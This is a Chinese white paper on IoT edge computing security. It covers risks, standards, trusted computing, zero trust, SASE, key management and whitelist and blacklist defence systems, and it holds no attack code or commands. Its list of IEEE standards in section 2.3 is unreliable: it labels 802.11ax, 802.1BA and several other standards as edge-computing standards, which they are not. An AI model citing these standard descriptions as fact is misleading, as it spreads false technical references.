边缘的引入使得终端设备的局域网决策处理、局部数据存储大 大增加, 数据的分布式管理带来了数据安全管理的难度; 整个物联网 边缘计算场景中, 设备、 子网、通信访问、计算频次都大大提升, 也 带来了防 DOS、防伪设备侵入的问题。因此, 仅遵循等级保护提出的 物联网安全网关不足以应对终端的安全管理和终端行为过程安全管 理。 可信边缘计算推进计划 5 2.2.2 边缘计算安全 边缘计算首先是以一种计算范式引入云计算框架的, 主要是为了 解决云-端直连效率低的问题,引入了边缘节点概念。随着边缘节点 技术的发展, 逐步形成了边缘节点的云化, 提出了终端可在边缘节点 间漂移, 边缘节点数据相互冗余的技术。这些技术的引入, 带来了边 缘节点自身安全、边-端安全和边-云安全的问题。 目前边缘计算的安全框架体系如图 2.2 ,包括网络服务安全、边 缘计算平台安全、应用安全、能力开放安全、管理安全、数据安全、 虚拟化安全和硬件安全。 图 2.2 边缘计算安全体系 物联网边缘计算场景中的边缘节点, 至少包括边缘计算节点(边 缘控制中心)、边缘网关和边缘安全管理中心。 若干个局部的物联网 络(连接物联网终端的无线或有线网络),引入一组边缘计算节点,边 缘计算节点不仅从业务角度要进行经济性的分布式计算、存储,还需 要通过边缘网关和边缘安全管理中心实现对物联网边缘计算中的边- 6 可信边缘计算推进计划 端安全、边-边安全和边-云安全; 最后接入云计算平台,形成云中心 的统一管理。在这样的场景下,除要注意图 3 安全框架的内容,还应 注意以下几点: 1) 物联网终端安全管理:形成设备认证和网络准入, 确保入 网设备的安全。 2) 物联网络安全管理:需要对物联网内部的流量进行监控, 并在边缘网关,根据业务形成局部物联网的访问控制。 3) 边缘计算过程安全管理:对于局域实时控制的边缘计算节 点(或称为边缘控制中心) ,其工作过程需要形成环境安全 (容器和中间件安全管理)和过程可追溯,并需要形成全程 监控,及时发现异常控制过程和异常节点。 4) 边缘计算数据安全:物联网终端自身对数据无法进行标签 化和加密, 因此需要边缘控制中心和边缘网关对物联网终 端数据进行数据标签化和通信过程加密。 5) 系统管理:物联网边缘计算可实现单一应用的海量设备接 入, 因此系统运维单位必须有强有力的安全运维能力提升 设备准入的安全门槛、持续跟踪系统内各节点的完整性和 常态化开展系统内部的漏洞管理。 2.2.3 云计算安全 云计算是物联网边缘计算的后端, 提供人工智能等高级算力, 也 是物联网边缘计算的组成部分。云计算的主要风险是引入云计算框架 后, 形成东西向交互(即虚拟机-虚拟机, 虚拟机-云框架),在这个层 可信边缘计算推进计划 7 面, 如果不开展防护, 则会形成安全防御的漏洞,使得攻击可以直接 从虚拟机发动。引入云框架后, 也带来了安全产品的虚拟化, 使得原 有安全产品也可以虚拟化形式为虚拟机或租户提供安全服务。 同物联网一样,云计算的安全也已经是等级保护的扩展要求之一。 等级保护提出的云安全框架,主要包括用户层安全、 区域边界安全、 计算环境安全和安全管理中心。 如图 2.3 所示: 图 2.3 云计算安全体系 2.3 研究现状 边缘计算方面的标准主要有以下几个: 1) ETSI MEC 标准:ETSI MEC 标准是欧洲电信标准化协会(ETSI) 制定的边缘计算标准。其中 ETSI GSMEC 009、011、012、013 、 014、015 等标准对系统架构、API 平台和开发、安全架构、安 全机制、安全管理和安全测试方面提出规范。 2) OpenFog 标准:OpenFog 标准是一个开放的、分布式的边缘计 8 可信边缘计算推进计划 算平台, 由 OpenFog 联盟制定。安全方面 OpenFog 提供包括 身份认证、访问控制、数据隔离方面的解决方案;安全协议方 面提供 TLS、DTLS、IPsec 等安全协议的应用规范, 来保障数 据传输和通信双方认证;安全管理方面 OpenFog 提供安全管 理的指导框架, 包括安全策略、 培训、审计等, 帮助组织建立 安全的雾计算管理体系。 3) IEEE 标准:IEEE 标准是由国际电气和电子工程师协会制定的 一系列边缘计算标准, 其中包括 IEEE 1934-2018 边缘计算架 构标准、 IEEE 1858-2016 边缘计算设备性能评估标准、 IEEE 2755-2019 边缘计算参考架构、 IEEE 2756-2019 边缘计算安全 标准、IEEE 802.1BA-2011 边缘计算网络标准、IEEE 802.11ax- 2019 边缘计算无线标准等。这些标准涵盖边缘计算的架构、设 备性能评估、参考架构、安全、网络和无线等方面, 为边缘计 算的发展提供标准化的指导和支持。 4) Cloud Native Computing Foundation(CNCF)标准:Cloud Native Computing Foundation(CNCF)是一个致力于推动云原生技术发 展和标准化的组织,旨在帮助企业更好地构建和管理云原生应 用。在 CNCF 中, 安全是一个非常重要的部分。安全工具和框 架:CNCF 提供了一系列的安全工具和框架, 如 Kubernetes 、 Prometheus、Falco 等, 帮助企业建立安全的云原生环境; 安全 最佳实践: CNCF 提供了一系列的安全最佳实践,如容器镜像 安全、 容器运行时安全、服务网格安全等, 帮助企业建立安全 可信边缘计算推进计划 9 的云原生应用; 安全认证:CNCF 提供了云原生安全认证, 帮 助企业评估和认证其云原生应用的安全性;安全事件响应: CNCF 提供了安全事件响应的指导和框架, 帮助企业快速响应 安全事件,保障业务的安全和稳定。CNCF 在安全方面提供了 一系列的工具、框架、 最佳实践和认证, 帮助企业构建和管理 安全的云原生应用。 这些标准都致力于为边缘计算提供统一的技术规范和架构, 以便 于开发和部署边缘计算应用程序,推动边缘计算技术的发展和应用。 3 物联网边缘计算安全风险与挑战 3.1 典型风险 边缘计算将云计算能力下沉到了网络边缘, 通常部署在网络边缘, 暴露在不安全环境中, 同时, 由于其计算能力开放的特性, 边缘计算 在应用、数据、网络、基础设施、物理环境、管理等方面存在着安全 风险问题, 如图 3.1 所示。 图 3.1 边缘计算风险一览图 从攻击手段和攻击结果来看,我们可以从以下角度来分析: 10 可信边缘计算推进计划 l 运行环境的破坏 对云、网、边、端各类硬件的操作系统/固件、应用平台和开发软 件的破坏。通过删除、修改特定程序文件或植入破坏性程序,导致运 行环境及整体应用工作不正常。典型形态有木马攻击、文件删除、文 件锁定、文件修改等。 l 网络环境的破坏 通过植入新的设备, 或利用已有设备的运行环境进行非法网络访 问,破坏物联网边缘计算的通信过程。典型形态有蠕虫、中间人攻击、 泛洪攻击、漏洞利用攻击等。 l 应用和数据攻击 通过植入新设备, 或利用已有设备的运行环境, 或利用现有应用 的漏洞进行提权,实现数据非法访问、 修改、销毁。 在国家工业信息安全发展研究中心和工业信息安全产业发展联 盟联合发布的《工业互联网边缘计算安全白皮书(2020)》 中,提出工 业领域边缘计算的主要威胁有使用不安全通信协议、数据防护缺失、 隐私保护不足、缺少轻量级的身份鉴别、不安全的接口、访问控制策 略不足、不安全的系统与组件、恶意的边缘计算节点、 易接收和发起 分布式拒绝服务、 硬件安全支持不足。 3.2 安全需求 物联网边缘计算的安全包括云、网、边、端的安全风险。 由于云 (云计算)、网(网络安全)、端(物联网终端)安全均已有了国家标准, 可 参见 GB/T 35279-2017 和 GB/T 37044-2018,以及等级保护标准体系 可信边缘计算推进计划 11 中的 GB/T 25070-2019、GB/T 22239-2019、GB/T 28448-2019 等标准。 边(边缘网关和边缘计算节点)则不仅有自己的安全需求和边缘 管理平台的安全需求, 还需要解决边端协同和云边协同的安全需求。 此外由于物联网终端自身安全防护能力较弱, 在引入边缘计算后, 可强化物联网终端的安全, 因此边缘网关和边缘计算节点, 还应该承 担物联网终端网络的设备认证和通信安全保障。 运营管理层面,物联网边缘计算需要从设备准入、设备/应用认证、 通信加密、权限管理、 漏洞管理、数据分类分级管理等方面进行安全 强化。 4 物联网边缘计算安全防护 4.1 关键技术 4.1.1 可信计算安全 可信计算一直是网络安全领域的一个重要基础技术, 如果实现了 从硬件、BIOS、操作系统、应用软件、文件、通信的全面可信,那么 构建一个纯净、安全的计算环境成为可能。在物联网边缘计算场景中, 引入了海量物联网终端,这些终端固件和应用软件简单,行为稳定, 非常适合引入可信计算。 可信计算(Trusted Computing)是一种基于硬件和软件的安全技术, 通过建立安全启动、安全存储、安全执行、安全通信等机制, 保护计 算机系统的完整性、机密性和可用性,防止恶意攻击和非授权访问。 可信计算技术可以提供可信计算基础设施(TCB),用于保护客户端设 备和数据的安全性和隐私性。 12 可信边缘计算推进计划 在可信计算中,重要的概念是 “ 可信计算基础设施”(Trusted Computing Base,TCB)。TCB 由可信组件和可信路径组成, 可信组件 是指在可信计算中被认为是安全和可靠的组件,包括硬件和软件等。 可信路径是指在可信计算过程中数据和控制信息的传输路径,通过对 可信路径的建立和保护, 确保计算过程中的数据不被篡改、截获和窃 取。 在物联网边缘计算中, 物联网终端要从出厂和采购阶段就应加强 设备可信根的管理, 从根本上杜绝不安全设备和非法设备的入网; 应 用层面宜采用可信计算机部署应用, 将可信计算机的可信根扩展到应 用认证和通信认证上。这些安全需求都是建立在对设备植入可信芯片, 并以此为基础开展可信管理的基础上。 4.1.2 轻量化安全容器 轻量化容器是边缘计算的支柱技术之一,应用于边缘计算设备中, 使得边缘计算可以在边缘云中进行方便地迁移。因此轻量化容器的安 全, 或者轻量化安全容器则也成为物联网边缘计算的关键技术之一。 安全容器技术是一种将应用程序和其相关依赖项包装在一起的 技术,以便在任何操作系统上都可以安全地运行。它基于虚拟化技术, 利用操作系统内核提供的资源隔离和安全保护机制来保护应用程序 免受恶意攻击。 Linux 基金会设立边缘社区 EdgeX Foundry,是一个开放源代码、 可互操作、可扩展的边缘计算平台,旨在加速边缘计算应用的开发和 部署。该社区汇聚了来自全球各地的技术领袖、企业和开发者,共同 可信边缘计算推进计划 13 推动边缘计算的发展和创新。在边缘安全方面 EdgeX Foundry 建议采 用软件定义边缘的模式和零信任安全模型,不能依靠一个私有的、可 信任的网络或者防火墙。 边缘计算的安全防护工具宜采用虚拟化和容器技术屏蔽底层硬 件的复杂性,为应用提供一致的服务。 就边缘计算安全的功能来说, 思科在指出边缘安全主要包括数据保护、 隐私保护、加密、身份和访 问控制以及合规管理。 WebAssembly 是为运行在 Web 上设计的,也可应用在物联网(IoT) 设备或者是移动/桌面应用程序中。 WebAssembly 具有可移植、体积 小、加载快、支持多种常用语言、 运行速度快等特点, 非常适合做为 物联网边缘计算的基础开发平台,并且能够提供容器和沙箱等功能。 WebAssembly 可以和 TEE(trust executive environments)结合,实现可 信计算环境,保障数据安全,实现隐私保护。在边缘计算中, WebAssembly 技术可以增强系统的安全性和可靠性,保护用户数据的 隐私和安全。 在物联网边缘计算安全框架中, 需要对这些开源技术进行消化吸 收和技术审计, 确保其无已知安全漏洞或不安全的编程范式, 同时需 要强化这些应用与安全操作系统的对接和对操作系统的安全调用,确 保其运行环境的安全。此外, 还需要加强对这些技术应用的安全技术 规范开发, 规范地这些开源技术的应用。 4.1.3 零信任安全 物联网边缘计算引入了海量终端, 使得点对点通信的频繁度大大 14 可信边缘计算推进计划 提高。传统的一次登录,永久使用的认证模式, 则极易造成黑客设备 替换正常设备, 从而发动攻击的情况。因此在物联网边缘计算中, 应 该引入零信任安全机制, 对设备、网络通信和应用功能执行执行高频 次认证。 零信任安全模型是一种基于认证、授权和加密的安全架构, 将安 全重心从边缘转移到了应用程序和数据上。在零信任安全模型中, 所 有用户、设备和应用程序都被视为潜在的威胁,需要经过身份验证和 授权后才能访问应用程序和数据。 零信任安全模型的核心思想是建立动态的信任关系。在传统的边 界安全模型中,用户只需要经过一次身份验证后就可以自由访问内部 网络, 但在零信任安全模型中, 用户需要在每次访问应用程序和数据 时都进行身份验证和授权。这种基于策略和行为的动态访问控制, 可 以大大减少安全风险,提高企业的安全性和合规性。 零信任安全技术可以消除边缘设备和网络中的信任漏洞,为边缘 计算提供了一种全面的安全策略, 将安全性从传统的基于位置和边界 的防御模式转变为基于身份、应用程序和数据的安全模式。在边缘计 算中, 零信任安全技术可以为系统提供更高的安全性和可靠性, 同时 保护数据的隐私和完整性。 4.1.4 SASE(安全访问服务边缘) SASE(安全访问服务边缘)技术结合了安全和网络功能,可以提供 一种安全的网络访问和边缘计算方案。 它通过云原生架构和软件定义的网络来为边缘设备提供安全连 可信边缘计算推进计划 15 接, 并使用人工智能和机器学习技术对网络流量进行分析和检测,从 而保护边缘计算设备和数据的安全性和隐私性。在边缘计算中,SASE 技术可以提高系统的安全性和可靠性,保护网络中的数据和应用程序。 SASE 技术包括多个关键组件,如 SD-WAN 、CASB 、FWaaS 、 SWG、ZTNA 等。其中, SD-WAN 是一种基于软件的广域网(WAN)技 术, 可以提高网络性能和可靠性; CASB 是云访问安全代理, 可以监 控和控制企业在云端的数据和应用程序;FWaaS 是基于云的防火墙服 务,可以提供全面的网络安全保护; SWG 是安全网关,可以帮助企 业管理和保护其网络边界; ZTNA 是一种零信任网络访问技术, 可以 实现动态的、基于策略的访问控制。 通过将这些技术和服务组合在一起,SASE 技术可以提供全面的 安全访问服务。通过 SASE 平台来管理和保护其网络和数据, 实现网 络加速、安全审计、 合规性监管等功能,同时降低网络和安全成本, 提高企业的业务灵活性和响应能力。 4.1.5 人工智能安全 人工智能(AI)在安全领域中具有巨大的潜力。 通过利用 AI 技术,可以大大提高安全的效率和准确性,为安全 提供更加全面、智能的能力支持。 人工智能安全技术可以通过监控、 分析和检测边缘计算设备和网络中的异常行为来提高边缘计算的安 全性。它可以利用机器学习和深度学习技术对设备、应用程序和数据 进行分析和识别,以检测和防止恶意攻击及数据泄露。在边缘计算中, 人工智能安全技术可以为系统提供实时的威胁检测和防御能力, 从而 16 可信边缘计算推进计划 保护边缘设备和数据的安全性和完整性。 4.1.6 区块链安全 物联网边缘计算场景中, 因为引入了海量设备, 因此其数据的可 信往往采用区块链的分布式记账功能来保障。因此区块链安全技术也 是物联网边缘计算安全的组成部分之一。 区块链技术是一种去中心化、分布式的数据库技术, 以数据块为 单位,通过密码学方法将数据块链接成不可篡改的链式结构。区块链 技术可以实现数据的去中心化管理和交换,确保数据的安全性和可信 性。 区块链技术的去中心化、分布式和不可篡改的特点可以有效地解 决边缘计算环境中的安全问题。区块链技术可以构建分布式身份认证 和授权机制, 确保设备和数据的合法性和可信性, 从而避免未经授权 的设备和数据进入边缘计算网络, 保障网络的安全。同时, 区块链技 术可以实现智能合约,自动化地执行安全策略, 降低安全管理的成本 和人力投入。 区块链安全技术可以通过分布式账本、去中心化、加密算法等手 段,提供可信任的边缘计算安全保障。它可以实现数据和设备的身份 验证、防篡改、溯源等功能,保障边缘计算网络的安全性和可靠性。 此外, 区块链技术还可以通过智能合约等方式, 实现对边缘设备和应 用程序的可编程安全控制,增强边缘计算的安全性和灵活性。 4.1.7 供应链安全 供应链安全是指在整个产品或服务的生命周期中,保护其安全性 可信边缘计算推进计划 17 和完整性, 以确保不会受到未经授权的篡改、破坏、窃取或其他形式 的攻击和威胁。在当今数字化和云计算时代,物联网边缘计算的供应 链安全也越来越重要, 因为攻击者可以通过利用供应链上的弱点来攻 击目标企业,获取重要的数据和信息, 甚至控制企业的业务流程和服 务。 为了确保供应链安全, 企业需要采取一系列的安全措施和策略。 其中, 关键的措施包括: 对供应商和合作伙伴进行严格的安全审核和 筛选,建立完善的供应链风险管理体系, 加强对供应链中各个环节的 监控和管理, 建立供应链攻击和威胁情报共享机制, 提高员工和供应 商的安全意识和培训,实施供应链安全技术解决方案等。 供应链安全技术可以对边缘计算网络中的供应链进行有效的监 控和管理, 保障边缘设备、应用程序和服务的可信性和安全性。 它可 以对供应链进行透明化、溯源化和可视化管理, 防范供应链中的各种 威胁和风险, 包括恶意代码、 漏洞利用、 供应链攻击等。此外, 供应 链安全技术还可以通过自动化检测、分析和响应机制, 实现对供应链 的实时监控和快速响应,增强边缘计算网络的安全性和可靠性。 4.2 物联网边缘计算安全防护框架 以可信和信任为核心, 考虑开放性、动态性业务场景要求, 从平 台和业务部署可信、平台和业务运行可信、业务交互和通信可信三个 维度进行设计, 结合安全管理和技术支撑。设计物联网边缘计算安全 框架如图 4.1 所示: 18 可信边缘计算推进计划 图 4.1 物联网边缘计算安全框架 4.2.1 基础支撑 基础支撑包括身份服务和密码服务,是物联网边缘计算参与各方 可信或者信任管理的基础, 支撑物联网边缘计算各层业务的安全管控。 其中身份指参与物联网边缘计算业务交互实体, 包括但不限于接 入物联网设备、物联网业务访问者、物联网服务和边缘计算中部署的 应用和服务,保障物联网边缘计算安全,需要对身份进行更全面管理。 密码服务除了提供数据传输加密以外, 还提供证书和签名等支撑, 密码服务和身份服务相结合,确保边缘计算参与个人的接入可信。 l 身份服务 身份服务是指用于管理物联网设备和用户身份的服务。它包括以 下几个方面: 身份认证:通过验证物联网设备和用户的身份,确保只有合法设 备和用户可以访问系统和数据。身份认证可以通过使用用户名和密码、 数字证书、 生物识别等技术实现。 可信边缘计算推进计划 19 访问控制:通过访问控制列表、权限管理等技术, 限制物联网设 备和用户对数据和系统的访问, 以确保数据和系统的安全性和保密性。 身份管理:包括用户注册、注销、密码重置等功能, 以确保设备 和用户的身份信息的准确性和安全性。 l 密码服务 旨在保护物联网设备和应用程序的安全性和保密性。它可以帮助 企业和个人提高物联网设备和应用程序的安全性, 防止黑客攻击、数 据泄漏等安全问题。 它包括以下几个方面: 日 密码策略管理:确定密码策略的一系列规则和控制, 以确保用 户的密码强度和密码使用符合安全标准。这包括密码长度、 复杂度、 更换周期、历史记录等。 日 密码加密:将密码以一种难以破解的方式进行加密, 以确保密 码在传输和存储过程中的安全性和保密性。这可以通过对称加密、非 对称加密、 哈希函数等技术实现。 日 密钥管理:确保物联网设备和数据使用的加密密钥不被泄漏或 破解的技术。这包括密钥生成、存储、保护和更新。 4.2.2 应用和服务安全 考虑物联网边缘计算的开放性和动态性,边缘计算应用和服务包 括业务和服务部署可信、 运行可信和业务交互可信。 l 边缘服务部署可信 包括确保边缘节点上部署的服务是经过认证和授权的、安全可靠 的,部署过程也是安全可靠的。 具体包含以下内容: 20 可信边缘计算推进计划 日 服务认证和授权:确保部署的服务是由合法的开发者或提供商 提供的, 并且已通过认证和授权。 日 安全部署: 确保服务的部署过程是安全可靠的, 包括防止恶意 软件注入、保护服务配置和证书等。 日 网络隔离:确保边缘服务的部署和运行不会对其他服务和节点 造成安全威胁,采用隔离技术和策略实现网络隔离。 l 边缘交互可信 包括确保边缘节点之间的通信是安全可靠的,数据传输的完整性、 保密性和可用性都得到保障。具体包含以下内容: 日 安全通信:确保通信链路是安全可靠的, 采用加密技术和证书 验证确保数据传输的完整性、保密性和可用性。 日 身份认证:确保通信的双方都是经过身份验证的合法节点, 采 用数字证书等技术实现身份认证。 日 访问控制:确保只有授权的节点可以访问边缘服务和数据, 采 用访问控制策略实现访问控制。 l 边缘运行安全可信 包括确保边缘节点上运行的服务是安全可靠的,运行过程中不会 受到攻击和威胁。具体包含以下内容: 日 安全运行环境:确保服务运行的环境是安全可靠的,采用沙箱、 容器和虚拟化等技术实现隔离和安全运行。 日安全监控:确保对服务和节点的运行状态进行实时监控和告警, 及时发现和处理安全事件。 可信边缘计算推进计划 21 日 安全更新:确保对服务的更新和升级是安全可靠的, 避免更新 过程中出现漏洞或故障。 4.2.3 数据安全 从数据隐私、系统实时性和整体效率考虑, 物联网边缘环节有存 储本地数据的需要, 安全防护结合边缘计算的特点, 参照数据全生命 周期安全,主要包括如下内容: l 数据源可信 数据源可信是指确保数据来自合法、可信的数据源。在物联网中, 数据源可能包括传感器、设备、终端等, 需要确保这些数据源是被信 任的、 没有被篡改的。为了实现数据源可信, 需要采用身份认证、数 字签名、访问控制等技术手段来确保数据源的可信性。 l 分类分级 分类分级是指根据数据的敏感程度将数据进行分类,并制定不同 的安全策略和措施。在物联网中,数据的敏感程度可能涉及个人隐私、 商业机密等, 需要对不同级别的数据进行不同的处理。为了实现分类 分级, 需要制定相应的数据安全政策和措施, 并对数据进行分类和标 识。 l 数据加解密 数据加解密是指采用加密算法对数据进行加密, 以保证数据在传 输和存储过程中的安全性。在物联网中, 数据可能被黑客窃取、篡改 等, 因此需要采用加密算法对数据进行保护。为了实现数据加解密, 需要选择合适的加密算法, 并采用密钥管理等技术手段,确保数据的 22 可信边缘计算推进计划 安全性。 l 数据使用安全 数据使用安全是指确保物联网边缘计算过程中使用数据的合法 性和合规性。需要建立合适的数据使用授权机制, 对数据的使用范围 和权限进行限制,以确保数据的安全使用。主要包含以下方面: 身份认证:对于所有的数据访问者,需要进行身份认证, 以确保 只有经过认证的用户才能够访问数据。 授权管理:针对各个不同的角色和访问场景,需要进行授权管理, 确定用户能访问哪些数据、以及进行何种操作等权限。确保只有授权 的用户或设备可以访问数据, 避免数据被未授权的人员或设备访问和 使用。 l 数据监测 数据监测是指对数据进行实时监测和分析, 以及对异常情况进行 及时响应和处理。在物联网中, 数据可能存在异常情况,如篡改、窃 取等, 需要采用数据监测技术来发现和处理异常情况。为了实现数据 监测,需要采用安全监测工具、日志分析等技术手段,对数据进行实 时监测和分析。 4.2.4 网络与通信安全 物联网边缘计算的网络与通信安全确保通信信道的建立和管理 可信,从以下几个方面对物联网边缘计算网络与通信安全进行防护: l 边缘组网安全 保障边缘设备和网关之间的通信安全, 确保设备之间的相互通信 可信边缘计算推进计划 23 是安全的、可靠的和私密的。边缘组网安全应包括边缘设备身份认证、 安全传输、数据加密和隐私保护等措施。 l 安全隔离 确保不同的边缘设备和网络之间的通信互不干扰,防止设备之间 的攻击和非法入侵。安全隔离应包括物理隔离、网络隔离、数据隔离 等。 具体措施包括建立安全网络架构、网络隔离、访问控制、入侵检 测等。 l 安全协议 指对物联网边缘计算设备之间通信过程中所采用的安全协议,确 保数据传输过程中的安全性和私密性。主要包括传输层安全协议、应 用层安全协议等。具体措施包括建立有效的加密协议、数字签名、身 份认证、 传输加密、 完整性检查等。 l 边端安全 保障边缘计算设备和终端之间的通信安全, 防止设备被攻击和非 法入侵。边端安全应包括设备认证、加密传输、数据完整性检查、固 件升级等措施。 l 云边安全 保障物联网边缘计算与云端之间的通信安全, 防止数据泄露和篡 改。云边安全主要包括云边协议安全、云边认证授权、数据安全等。 同时, 在云端应建立合理的安全架构和防御机制, 防止云端被攻击和 入侵。 24 可信边缘计算推进计划 4.2.5 设备和系统安全 物联网边缘计算设备和系统安全主要对物联网边缘计算业务的 底层平台进行可信管理, 硬件设备、操作系统和通用的软件平台安全 可信。 l 设备可信 是指物联网边缘设备的硬件和软件必须是可信的, 以确保设备不 受恶意攻击。设备可信包括如下内容: 硬件安全:设备硬件需要具备防篡改、防窃听、防破坏等安全机 制; 软件安全:设备软件需要使用数字签名、代码加密、 漏洞修复等 手段保障其安全; 设备管理安全:确保设备可以进行安全的配置、升级、管理等操 作; 设备认证安全:提供可靠的设备身份认证,防止伪造和欺骗。 l 系统可信 是指物联网边缘系统必须是可信的, 以保护数据和应用程序不受 到攻击和破坏。系统可信包括如下内容: 操作系统安全:确保边缘设备上的操作系统是安全的, 不受恶意 软件的攻击; 应用程序安全:保证应用程序的安全, 包括防止代码注入、越界 访问、 缓冲区溢出等攻击; 网络通信安全:确保设备间的通信是加密的、可靠的, 并进行必 可信边缘计算推进计划 25 要的访问控制和身份认证; 数据存储安全:保护边缘设备上的数据, 包括加密存储、访问控 制等安全机制。 l 平台可信 指物联网边缘平台提供安全可信的服务和功能,能够满足不同应 用的安全需求。平台可信需要考虑以下内容: 平台身份认证和授权、平台数据保护和隐私保护、平台服务和接 口的安全防护和监控、平台应用程序的安全管理和审核。 l 运行安全 指物联网边缘设备、系统和平台在运行时保持安全可信, 避免遭 受各种攻击和威胁。运行安全需要考虑以下内容: 运行环境的安全防护和监控、运行数据的保护和加密、运行程序 的漏洞管理和修复、运行时的安全审计和监控。 4.2.6 全生命周期安全 全生命周期安全是指在物联网边缘计算系统的整个生命周期内, 从设计、 开发、部署、运行到退役等不同阶段,采取一系列措施和方 法, 确保系统的可靠性和安全性。全生命周期安全的目标是在物联网 边缘计算系统的整个生命周期中, 确保系统的安全和完整性, 以保护 数据和用户的隐私和安全, 确保系统的持续运行和稳定性。 l 设计安全 在设计物联网边缘计算系统时, 需要考虑安全问题, 确定系统安 全需求和安全策略, 并采用安全设计原则,如最小权限原则、分层原 26 可信边缘计算推进计划 则、缓冲区溢出防护原则等。 l 建设和部署安全 在开发阶段,采用安全编码规范和安全开发流程,确保代码的安 全性。同时,进行安全测试,包括功能测试、性能测试、压力测试、 安全测试等, 以保证系统的稳定性和安全性。在物联网边缘计算系统 部署时, 需要采用安全配置和安全加固措施, 包括网络隔离、身份认 证、访问控制、数据加密、应用程序安全等,以保障系统的安全性。 l 运行和运维安全 在物联网边缘计算系统运行时, 需要采用监控和漏洞管理等手段, 及时发现和修复漏洞,保障系统的安全性。在维护和更新阶段,定期 进行系统安全检查和漏洞扫描,及时更新系统和设备的安全补丁,保 证系统的安全性和可靠性。 l 备份和恢复 采取备份措施, 定期备份边缘计算环境的关键数据和系统设置, 并建立恢复机制, 以确保在数据丢失或系统崩溃的情况下能够快速恢 复,以确保系统的可靠性和稳定性。 l 退役安全 在物联网设备或系统被淘汰或废弃时,如何保证其中的数据和资 产安全的问题。主要考虑:数据的清除、资产的处理包括硬件设备、 存储介质等、 记录的保存、安全审计等。 4.2.7 安全管理 物联网边缘计算安全管理是指对物联网边缘计算网络中的各个 可信边缘计算推进计划 27 节点和设备进行全面、系统的安全管理, 包括安全策略的管控、安全 事件的持续监测和信任评估和响应、以及安全管理中心等一系列措施。 其目的是保障物联网边缘计算网络中各个节点和设备的安全, 防止安 全威胁对网络和设备造成损害的全面、系统的安全管理措施。 l 安全策略管控 安全策略管控指定安全策略的定义、制定、发布、实施、 审核和 调整等。这些策略可以包括网络安全策略、访问控制策略、设备安全 策略、数据安全策略等。 l 持续监测和信任评估 是指通过实时监测物联网系统和设备的安全状况,及时发现和处 理潜在的安全威胁和风险。持续监测可以包括对网络、设备和应用程 序的日志记录、行为分析、 漏洞扫描、安全事件响应等方面的监测, 从而实现对物联网系统和设备的全面安全保障。信任评估则是通过对 系统和设备的安全性能、信任度和合规性进行评估,保证物联网系统 和设备的安全和可靠性。 l 安全管理中心 是对整个物联网系统进行统一管理和控制的中心节点, 负责对物 联网系统中的各种安全事件进行监测、处理和报告。安全管理中心需 要具备实时监测、智能分析、 自动应对等功能, 可以实现对物联网系 统的全面安全管理。应包含: 日 日志管理:记录和管理安全日志和审计日志,以便后续分析和 追溯。 28 可信边缘计算推进计划 日 安全审计和合规管理:对物联网系统和设备进行安全审计, 检 查和评估系统和设备的合规性和符合性,确保其满足相关的法律法规 和安全标准。 日 安全事件响应和处理:建立安全事件响应和处理机制, 对物联 网系统和设备的安全事件进行及时处理和响应, 保护物联网系统和设 备的安全和稳定。 4.3 物联网安全防护体系 结合安全关键技术和安全框架体系, 我们认为物联网边缘计算的 安全需要开展以下安全体系工作。 4.3.1 原生安全工作体系 原生安全面向物联网终端固件,边缘节点操作系统、应用平台和 应用软件,云计算基础架构、 虚拟机操作系统、应用平台和软件。应 包括物联网边缘计算中所有硬件设备、操作系统/固件、第三方库、应 用软件产品的安全。可从以下几个方面开展: l 采购准入:需要建立物联网边缘计算平台的采购准入体系, 准 入标准可与第三方权威机构或自建安全实验室联动, 仅有通过 漏洞扫描、漏洞挖掘、渗透测试的产品才可以进入采购体系。 l 完整性保障:应逐步建立应用程序文件、缓存、数据的分离, 实现在系统运行过程中, 应用程序文件不变。在此基础上,对 采购准入的产品进行应用程序文件清单及其单项散列值的采 集和建库,并在运维过程中, 常态化检查完整性。还可引入可 信根签名技术,进一步实现可信组件管理。 可信边缘计算推进计划 29 l 漏洞管理:建立面向物联网边缘计算应用体系的漏洞管理机制, 定期跟踪权威机构的漏洞公告,对涉及自身体系内的漏洞予以 及时修补。特别针对工业现场控制领域的, 需要自建实验室进 行漏洞修补测试,通过修补的兼容性测试后, 在系统内推进修 补工作。 4.3.2 密码管理工作体系 要逐步建立全面的密码管理体系, 落实可信根密码管理和通信密 码管理。 l 密钥管理:结合原生安全,对于入网的设备发放入网密钥。 PC 类设备, 直接配备可信芯片、密钥卡或密钥 U 盘,非 PC 类设备可通过一个密码代理再接入网络。从而使得每个设备 均有密码作为身份鉴别和加密私钥。 l 分布式公钥查询: 可利用边缘计算节点算力建立分布式 LDAP 树的公钥查询体系。边缘节点辖区内设备直接在边缘 节点查询到公钥,跨边缘节点的查询,可利用 P2P 网络或金 字塔管理模式实现查询。 由此提供高效、高速的公钥查询服 务。 l 基于密码的设备管理:用发放公钥或注册公钥作为管理层面 的设备唯一标识,设备应用层间可利用这个标识对 BIOS/固 件、操作系统、应用软件进行带密码的单向散列计算,实现 更严谨的可信组件完整性管理。 l 基于密码的访问控制管理:在网络管理层面可在物联网终端 30 可信边缘计算推进计划 入网代理和边缘网关层面加载加密通信模块,实现加密通信; 在物联网层面的高实时通信,可采用非对称加密通信实现密 钥协商和时间同步,同时对主信道采用流密码通信加密。 整 体网络层面,加密设备可访问非加密设备,而非加密设备不 可访问加密设备。 l 密码设备的入网和退出:可代用区块链的模式,对设备入网 和退出进行区域记账,从而使得退出的密钥可立即进入黑名 单,并在 P2P 网络中传播,避免作废密钥的重复利用。 4.3.3 网络层面的白名单工作体系 网络层面的白名单工作机制, 主要服务于物联网层面, 特别是物 联网的控制层面。此类网络通信模式简单,通信格式固定,流量较低。 部分网络因其重要性,不能直接连入互联网, 得到安全厂商的支持。 在这样的网络环境下,需要积极建设网络层面的白名单机制, 需 要构建网内和跨网的点对点通信模型、每对通信的协议族清单、每个 协议的指令类型白名单等,从而严格实现物联网终端层面的流量净化。 在物联网边缘计算的物联网网络层面和边缘网络层面,还可以引 入人工智能技术, 对流量进行智能学习。由于此类网络流量的行为相 对简单,因此可以通过对抗生成网络形成人工智能的设备网络行为白 名单画像,并可以此为依据建立流量监控, 进一步将网络白名单细化 到行为层面。 4.3.4 互联网层面的黑名单工作体系 互联网层面的黑名单工作体系, 主要是面向云计算层面和对接入 可信边缘计算推进计划 31 互联网的边缘计算节点的保障。此类设备可直接访问互联网, 因此可 以得到安全厂商的工作。 黑名单工作体系的安全产品,主要包括主机防病毒、网络防病毒、 入侵检测、僵尸木马蠕虫检测、APT 检测、漏洞检测等。 对于地级市以上的大型物联网边缘计算体系, 应建立威胁情报工 作机制, 